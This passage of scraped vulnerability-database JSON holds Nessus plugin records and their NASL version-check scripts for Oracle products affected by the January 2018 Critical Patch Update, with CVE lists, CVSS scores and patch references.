"136d74218fd7bbffb965e96b48d66235"}, "pluginID": "106349", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(106349);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/25\");\n\n script_cve_id(\n \"CVE-2015-7501\",\n \"CVE-2015-7940\",\n \"CVE-2016-0635\",\n \"CVE-2016-1182\",\n \"CVE-2016-2107\",\n \"CVE-2016-2179\",\n \"CVE-2017-3732\",\n \"CVE-2017-5645\",\n \"CVE-2017-9798\",\n \"CVE-2017-10068\",\n \"CVE-2017-10262\",\n \"CVE-2017-10273\",\n \"CVE-2017-10352\",\n \"CVE-2017-12617\",\n \"CVE-2018-2561\",\n \"CVE-2018-2564\",\n \"CVE-2018-2584\",\n \"CVE-2018-2594\",\n \"CVE-2018-2595\",\n \"CVE-2018-2596\",\n \"CVE-2018-2601\",\n \"CVE-2018-2610\",\n \"CVE-2018-2625\",\n \"CVE-2018-2711\",\n \"CVE-2018-2713\",\n \"CVE-2018-2715\",\n \"CVE-2018-2733\"\n );\n script_bugtraq_id(\n 78215,\n 79091,\n 89760,\n 91067,\n 91869,\n 92987,\n 95814,\n 97702,\n 98050,\n 100872,\n 100954,\n 102442,\n 102535,\n 102539,\n 102541,\n 102545,\n 102550,\n 102553,\n 102558,\n 102562,\n 102565,\n 102567,\n 102569,\n 102573,\n 102634,\n 102637,\n 102641,\n 102643\n );\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/15\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0240\");\n\n script_name(english:\"Oracle iPlanet Web Server 7.0.x < 7.0.27 NSS Unspecified Vulnerability (January 2018 CPU)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server is affected by an unspecified vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version, the Oracle iPlanet Web Server\n(formerly known as Sun Java System Web Server) running on the remote\nhost is 7.0.x prior to 7.0.27 Patch 26834070. It is, therefore,\naffected by an unspecified vulnerability in the Network Security\nServices (NSS) library with unknown impact.\");\n # http://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?ae82f1b1\");\n # https://support.oracle.com/epmos/faces/SearchDocDisplay?_adf.ctrl-state=14v5w3zyq8_4&_afrLoop=466151680153736#babhdcfj\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?fccabced\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Oracle iPlanet Web Server version 7.0.27 or later as\nreferenced in the January 2018 Oracle Critical Patch Update advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-7501\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2017-10352\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Apache Tomcat for Windows HTTP PUT Method File Upload\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Tomcat RCE via JSP Upload Bypass');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/01/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/01/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/01/25\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:iplanet_web_server\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:mozilla:network_security_services\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Web Servers\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"oracle_iplanet_web_server_detect.nbin\");\n script_require_keys(\"installed_sw/Oracle iPlanet Web Server\");\n\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"audit.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"install_func.inc\");\ninclude(\"http.inc\");\n\napp_name = \"Oracle iPlanet Web Server\";\nport = get_http_port(default:8989);\n\ninstall = get_single_install(app_name:app_name, port:port, exit_if_unknown_ver:TRUE);\nversion = install['version'];\n\nfix = \"7.0.27\";\nmin = \"7.0\";\n\n\n\n# Affected 7.0.x < 7.0.27\nif (\n ver_compare(ver:version, fix:min, strict:FALSE) >= 0 &&\n ver_compare(ver:version, fix:fix, strict:FALSE) == -1\n)\n{\n report = report_items_str(\n report_items:make_array(\n \"Installed version\", version,\n \"Fixed version\", fix\n ),\n ordered_fields:make_list(\"Installed version\", \"Fixed version\")\n );\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:report);\n}\nelse audit(AUDIT_LISTEN_NOT_VULN, app_name, port, version);\n", "naslFamily": "Web Servers", "cpe": ["cpe:/a:oracle:iplanet_web_server", "cpe:/a:mozilla:network_security_services"], "solution": "Upgrade to Oracle iPlanet Web Server version 7.0.27 or later as referenced in the January 2018 Oracle Critical Patch Update advisory.", "nessusSeverity": "Critical", "cvssScoreSource": "CVE-2015-7501", "vendor_cvss2": {"score": 10, "vector": "CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "vendor_cvss3": {"score": 9.9, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:H"}, "vpr": {"risk factor": "Critical", "score": "9.2"}, "exploitAvailable": true, "exploitEase": "Exploits are available", "patchPublicationDate": "2017-01-17T00:00:00", "vulnerabilityPublicationDate": "2017-01-17T00:00:00", "exploitableWith": ["Core Impact", "Elliot(Apache Tomcat for Windows HTTP PUT Method File Upload)", "CANVAS(CANVAS)", "Metasploit(Tomcat RCE via JSP Upload Bypass)"]}

{"nessus": [{"lastseen": "2023-05-18T14:23:43", "description": "The version of Oracle HTTP Server installed on the remote host is affected by multiple vulnerabilities as noted in the January 2018 CPU advisory.", "cvss3": {}, "published": "2018-01-24T00:00:00", "type": "nessus", "title": "Oracle Fusion Middleware Oracle HTTP Server Multiple Vulnerabilities (January 2018 CPU)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-7501", "CVE-2015-7940", "CVE-2016-0635", "CVE-2016-1182", "CVE-2016-2107", "CVE-2016-2179", "CVE-2017-10068", "CVE-2017-10262", "CVE-2017-10273", "CVE-2017-10352", "CVE-2017-12617", "CVE-2017-3732", "CVE-2017-5461", "CVE-2017-5645", "CVE-2017-9798", "CVE-2018-2561", "CVE-2018-2564", "CVE-2018-2584", "CVE-2018-2596", "CVE-2018-2601", "CVE-2018-2625", "CVE-2018-2711", "CVE-2018-2713", "CVE-2018-2715", "CVE-2018-2760"], "modified": "2023-04-25T00:00:00", "cpe": ["cpe:/a:oracle:fusion_middleware", "cpe:/a:oracle:http_server"], "id": "ORACLE_HTTP_SERVER_CPU_JAN_2018.NASL", "href": "https://www.tenable.com/plugins/nessus/106299", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(106299);\n script_version(\"1.20\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/25\");\n\n script_cve_id(\n \"CVE-2015-7501\",\n \"CVE-2015-7940\",\n \"CVE-2016-0635\",\n \"CVE-2016-1182\",\n \"CVE-2016-2107\",\n \"CVE-2016-2179\",\n \"CVE-2017-3732\",\n \"CVE-2017-5461\",\n \"CVE-2017-5645\",\n \"CVE-2017-9798\",\n \"CVE-2017-10068\",\n \"CVE-2017-10262\",\n \"CVE-2017-10273\",\n \"CVE-2017-10352\",\n \"CVE-2017-12617\",\n \"CVE-2018-2561\",\n \"CVE-2018-2564\",\n \"CVE-2018-2584\",\n \"CVE-2018-2596\",\n \"CVE-2018-2601\",\n \"CVE-2018-2625\",\n \"CVE-2018-2711\",\n \"CVE-2018-2713\",\n \"CVE-2018-2715\",\n \"CVE-2018-2760\"\n );\n script_bugtraq_id(\n 78215,\n 79091,\n 89760,\n 91067,\n 91869,\n 92987,\n 95814,\n 97702,\n 98050,\n 100872,\n 100954,\n 102442,\n 102535,\n 102539,\n 102541,\n 102545,\n 102550,\n 102553,\n 102558,\n 102562,\n 102565,\n 102567,\n 102569,\n 102573,\n 103826\n );\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/15\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0240\");\n\n script_name(english:\"Oracle Fusion Middleware Oracle HTTP Server Multiple Vulnerabilities (January 2018 CPU)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Oracle HTTP Server installed on the remote host is\naffected by multiple vulnerabilities as noted in the January 2018\nCPU advisory.\");\n # https://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html#AppendixFMW\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?6072c657\");\n # http://www.oracle.com/technetwork/security-advisory/cpuapr2018-3678067.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?76507bf8\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the appropriate patch according to the January 2018 Oracle Critical\nPatch Update advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-7501\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2017-10352\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Apache Tomcat for Windows HTTP PUT Method File Upload\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Tomcat RCE via JSP Upload Bypass');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/01/16\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/01/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/01/24\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:fusion_middleware\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:http_server\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Web Servers\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"oracle_http_server_installed.nbin\");\n script_require_keys(\"Oracle/OHS/Installed\");\n\n exit(0);\n}\n\ninclude('oracle_http_server_patch_func.inc');\n\nget_kb_item_or_exit('Oracle/OHS/Installed');\ninstall_list = get_kb_list_or_exit('Oracle/OHS/*/EffectiveVersion');\n\ninstall = branch(install_list, key:TRUE, value:TRUE);\n\npatches = make_array();\npatches['11.1.1.7'] = make_array('fix_ver', '11.1.1.7.180116', 'patch', '27197885');\npatches['11.1.1.9'] = make_array('fix_ver', '11.1.1.9.180116', 'patch', '27301611');\npatches['12.1.3.0'] = make_array('fix_ver', '12.1.3.0.190130', 'patch', '27244723');\npatches['12.2.1.2'] = make_array('fix_ver', '12.2.1.2.171220', 'patch', '27198002');\npatches['12.2.1.3'] = make_array('fix_ver', '12.2.1.3.171117', 'patch', '27149535');\n\noracle_http_server_check_vuln(\n install : install,\n min_patches : patches,\n severity : SECURITY_HOLE\n);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-20T14:43:08", "description": "The version of Oracle Business Intelligence Publisher running on the remote host is 11.1.1.9.x prior to 11.1.1.9.180116 or 12.2.1.2.x prior to 12.2.1.2.180116 or 12.2.1.3.x prior to 12.2.1.3.180116. It is, therefore, affected by multiple vulnerabilities as noted in the January 2018 Critical Patch Update advisory.\nThe Oracle Business Intelligence Publisher installed on the remote host is affected by multiple vulnerabilities:\n\n - An improper restriction of the lifetime of queues entries associated with unused our-of-order messages allows an remote attacker to cause a denial of service in the DTLS implementationof OpenSSL before 1.1.0 (CVE-2016-2179).\n - An easily exploitable vulnerability allows an unauthenticated attacker with network access to compromise Oracle Business Intelligence Enterprise Edition via HTTP. A Successful attack of this vulnerability would result in unauthorized access to data as well as unauthorized update, insert or delete.\n This attack would required human interaction. (CVE-2017-10068).\n - An low privileged attacker with network access via HTTP can exploit a vulnerability in Oracle Business Intelligence Enterprise Edition. A successful attack would allow the unauthorized access to critical data (CVE-2018-2715).\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2018-12-27T00:00:00", "type": "nessus", "title": "Oracle Business Intelligence Publisher Multiple Vulnerabilities (January 2018 CPU)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-2179", "CVE-2017-10068", "CVE-2018-2715"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:oracle:fusion_middleware", "cpe:/a:oracle:business_intelligence_publisher"], "id": "ORACLE_BI_PUBLISHER_JAN_2018_CPU.NASL", "href": "https://www.tenable.com/plugins/nessus/119885", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(119885);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2016-2179\", \"CVE-2017-10068\", \"CVE-2018-2715\");\n script_bugtraq_id(92987, 102535, 102558);\n\n script_name(english:\"Oracle Business Intelligence Publisher Multiple Vulnerabilities (January 2018 CPU)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Oracle Business Intelligence Publisher running on the\nremote host is 11.1.1.9.x prior to 11.1.1.9.180116 or\n12.2.1.2.x prior to 12.2.1.2.180116 or 12.2.1.3.x prior to \n12.2.1.3.180116. \nIt is, therefore, affected by multiple vulnerabilities as noted in \nthe January 2018 Critical Patch Update advisory.\nThe Oracle Business Intelligence Publisher installed on the remote\nhost is affected by multiple vulnerabilities:\n\n - An improper restriction of the lifetime of queues entries\n associated with unused our-of-order messages allows an\n remote attacker to cause a denial of service in the \n DTLS implementationof OpenSSL before 1.1.0\n (CVE-2016-2179).\n - An easily exploitable vulnerability allows an\n unauthenticated attacker with network access to \n compromise Oracle Business Intelligence Enterprise\n Edition via HTTP. A Successful attack of this \n vulnerability would result in unauthorized access to\n data as well as unauthorized update, insert or delete.\n This attack would required human interaction. \n (CVE-2017-10068).\n - An low privileged attacker with network access via HTTP\n can exploit a vulnerability in Oracle Business\n Intelligence Enterprise Edition. A successful attack\n would allow the unauthorized access to critical data\n (CVE-2018-2715).\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n # https://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?7ee54bd8\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the appropriate patch according to the January 2018 Oracle\nCritical Patch Update advisory.\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-10068\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/01/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/01/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/12/27\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:fusion_middleware\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:business_intelligence_publisher\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"oracle_bi_publisher_installed.nbin\", \"oracle_bi_publisher_detect.nasl\");\n script_require_keys(\"installed_sw/Oracle Business Intelligence Publisher\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\ninclude('vcf_extras.inc');\nappname = 'Oracle Business Intelligence Publisher';\napp_info = vcf::get_app_info(app:appname);\n\n# 11.1.1.9.x - Bundle: 27281232 | Patch: 27321329\n# 12.2.1.2.x - Bundle: 27072632 | Patch: 27072632\n# 12.2.1.3.x - Bundle: 26796833 | Patch: 26796833\n\nconstraints = [\n {'min_version': '11.1.1.9', 'fixed_version': '11.1.1.9.180116', 'patch': '27321329', 'bundle': '27281232'},\n {'min_version': '12.2.1.2', 'fixed_version': '12.2.1.2.180116', 'patch': '27072632', 'bundle': '28500593'},\n {'min_version': '12.2.1.3', 'fixed_version': '12.2.1.3.180116', 'patch': '26796833', 'bundle': '26796833'}\n];\n\nvcf::oracle_bi_publisher::check_version_and_report(app_info: app_info, constraints:constraints, severity:SECURITY_WARNING);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-06-02T14:29:32", "description": "The version of Oracle WebCenter Portal installed on the remote host is missing a security patch from the January 2018 Critical Patch Update (CPU). It is, therefore, affected by multiple vulnerabilities.\n\n - A vulnerability in the PeopleSoft Enterprise HCM Human Resources component of Oracle PeopleSoft Products (subcomponent: Install (Bouncy Castle Java package)).\n Supported versions that are affected are 9.1 and 9.2.\n An unauthenticated attacker with network access via HTTP can exploit the vulnerability to compromise PeopleSoft Enterprise HCM Human Resources.\n A successful attacks of this vulnerability can result in unauthorized read access to a subset of PeopleSoft Enterprise HCM Human Resources accessible data.\n (CVE-2015-7940)\n\n - A vulnerability in the Oracle WebCenter Portal component of Oracle Fusion Middleware (subcomponent: Security Framework (Apache Struts 1)). Supported versions that are affected are 11.1.1.9.0, 12.2.1.2.0 and 12.2.1.3.0. An unauthenticated attacker with network access via HTTP can exploit the vulnerability to compromise Oracle WebCenter Portal. A successful attacks of this vulnerability can result in a complete Denial-of-Service of Oracle WebCenter Portal including the update, insert or delete access to some of Oracle Web Portal accessible data. (CVE-2016-1182)\n\n - A vulnerability in the Oracle WebCenter Portal component of Oracle Fusion Middleware (subcomponent: WebCenter Spaces Application). Supported versions that are affected are 11.1.1.9.0, 12.2.1.2.0 and 12.2.1.3.0. An unauthenticated attacker with network access via HTTP can exploit the vulnerability to compromise Oracle WebCenter Portal.\n A successful attack require humans interaction to be effective and can result in unauthorized creation, deletion or modification access to Oracle WebCenter Portal data.\n (CVE-2018-2713)", "cvss3": {}, "published": "2018-02-12T00:00:00", "type": "nessus", "title": "Oracle WebCenter Portal Multiple Vulnerabilities (January 2018 CPU)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-7940", "CVE-2016-1182", "CVE-2018-2713"], "modified": "2023-05-31T00:00:00", "cpe": ["cpe:/a:oracle:fusion_middleware"], "id": "ORACLE_WEBCENTER_PORTAL_CPU_JAN_2018.NBIN", "href": "https://www.tenable.com/plugins/nessus/106759", "sourceData": "Binary data oracle_webcenter_portal_cpu_jan_2018.nbin", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:24:55", "description": "The version of Oracle JDeveloper installed on the remote host is missing a security patch. Please see the vendor advisory for additional information.", "cvss3": {}, "published": "2018-02-20T00:00:00", "type": "nessus", "title": "Oracle JDeveloper Multiple Vulnerabilities (January 2018 CPU)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-10273", "CVE-2018-2711"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:oracle:fusion_middleware", "cpe:/a:oracle:jdeveloper"], "id": "ORACLE_JDEVELOPER_CPU_JAN_2018.NASL", "href": "https://www.tenable.com/plugins/nessus/106903", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(106903);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2017-10273\", \"CVE-2018-2711\");\n script_bugtraq_id(102539, 102569);\n\n script_name(english:\"Oracle JDeveloper Multiple Vulnerabilities (January 2018 CPU)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A software development application installed on the remote host is\naffected by a vulnerability which allows restricted path traversal \ndue to improperly sanitized input as well as allowing the attacker\naccess to partially modify data\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Oracle JDeveloper installed on the remote host is\nmissing a security patch. Please see the vendor advisory for \nadditional information.\");\n # https://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html#AppendixFMW\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?6072c657\");\n # https://support.oracle.com/epmos/faces/DocumentDisplay?_afrLoop=398463191708425&id=2325393.1&_afrWindowMode=0&_adf.ctrl-state=13jjrzsqze_249\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?2edd68c9\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the appropriate patch according to the January 2018 Oracle\nCritical Patch Update advisory.\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-2711\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/01/16\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/01/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/02/20\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:fusion_middleware\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:jdeveloper\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"oracle_jdeveloper_installed.nbin\");\n script_require_keys(\"installed_sw/Oracle JDeveloper\");\n\n exit(0);\n}\n\ninclude('vcf_extras_oracle.inc');\n\nvar app_info = vcf::oracle_jdev::get_app_info();\n\nvar constraints = [\n { 'min_version':'11.1.1.7', 'fixed_version':'11.1.1.7.171220', 'missing_patch':'27251436' },\n { 'min_version':'11.1.1.9', 'fixed_version':'11.1.1.9.171117', 'missing_patch':'27120730' },\n { 'min_version':'11.1.2.4', 'fixed_version':'11.1.2.4.171206', 'missing_patch':'27213077' },\n { 'min_version':'12.1.3.0', 'fixed_version':'12.1.3.0.171218', 'missing_patch':'27131743' },\n { 'min_version':'12.2.1.2', 'fixed_version':'12.2.1.2.171017', 'missing_patch':'26752344' }\n];\n\nvcf::oracle_jdev::check_version_and_report(\n app_info:app_info,\n severity:SECURITY_WARNING,\n constraints:constraints\n);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:23:57", "description": "The remote host is missing the January 2018 Critical Patch Update for Oracle Identity Manager. It is, therefore, affected by multiple vulnerabilities as described in the January 2018 critical patch update advisory.", "cvss3": {}, "published": "2018-01-18T00:00:00", "type": "nessus", "title": "Oracle Identity Manager Multiple Vulnerabilities (January 2018 CPU)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-7501", "CVE-2016-0635"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:oracle:identity_manager"], "id": "ORACLE_IDENTITY_MANAGEMENT_CPU_JAN_2018.NASL", "href": "https://www.tenable.com/plugins/nessus/106140", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(106140);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2015-7501\", \"CVE-2016-0635\");\n script_bugtraq_id(78215, 91869);\n\n script_name(english:\"Oracle Identity Manager Multiple Vulnerabilities (January 2018 CPU)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"An application installed on the remote host is affected multiple\nvulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is missing the January 2018 Critical Patch Update for\nOracle Identity Manager. It is, therefore, affected by multiple\nvulnerabilities as described in the January 2018 critical patch\nupdate advisory.\");\n # https://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html#AppendixFMW\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?6072c657\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the appropriate patch according to the January 2018 Oracle\nCritical Patch Update advisory.\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/11/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/01/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/01/18\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:identity_manager\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"oracle_identity_management_installed.nbin\");\n script_require_keys(\"installed_sw/Oracle Identity Manager\");\n\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"oracle_rdbms_cpu_func.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"install_func.inc\");\n\nproduct = \"Oracle Identity Manager\";\ninstall = get_single_install(app_name:product, exit_if_unknown_ver:TRUE);\n\nversion = install['version'];\npath = install['path'];\n\nfixed = NULL;\nreport = 